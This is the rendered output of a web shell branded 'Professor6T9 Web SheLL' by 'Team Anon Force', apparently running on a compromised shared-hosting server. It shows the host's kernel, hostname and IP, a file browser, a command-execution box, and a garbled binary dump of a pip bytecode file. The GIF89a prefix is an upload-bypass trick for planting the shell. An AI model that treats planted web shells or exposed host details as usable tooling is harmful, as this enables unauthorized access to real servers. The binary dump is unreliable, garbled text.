GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
proc
/
thread-self
/
root
/
opt
/
hc_python
/
lib
/
python3.12
/
site-packages
/
pip
/
_internal
/
utils
/
__pycache__
[ HOME ]
Exec
Submit
File Name : glibc.cpython-312.pyc
� 0�/i� � �@ � d dl mZ d dlZd dlZdd�Zdd�Zdd�Zdd�Zy) � )�annotationsNc �. � t � xs t � S )z9Returns glibc version string, or None if not using glibc.)�glibc_version_string_confstr�glibc_version_string_ctypes� � �H/opt/hc_python/lib/python3.12/site-packages/pip/_internal/utils/glibc.py�glibc_version_stringr s � �'�)�J�-H�-J�Jr c � � t j dk( ry t j d� } | �y| j � \ }}|S # t t t f$ r Y yw xY w)z@Primary implementation of glibc_version_string using os.confstr.�win32N�CS_GNU_LIBC_VERSION)�sys�platform�os�confstr�split�AttributeError�OSError� ValueError)�gnu_libc_version�_�versions r r r se � � �|�|�w�����:�:�&;�<���#��%�+�+�-� ��7� �N�� �G�Z�0� ���s �A �A �A�Ac � � ddl } | j d� } |j }| j |_ |� }t |t � s|j d� }|S # t $ r Y yw xY w# t $ r Y yw xY w# t $ r Y yw xY w)z=Fallback implementation of glibc_version_string using ctypes.r N�ascii)�ctypes�ImportError�CDLLr �gnu_get_libc_versionr �c_char_p�restype� isinstance�str�decode)r �process_namespacer �version_strs r r r s� � ���"�"�K�K��-���0�E�E�� $*�?�?�� �+�-�K��k�3�'�!�(�(��1�����G � ����$ � ���� � � ��s3 �A �A/ �A>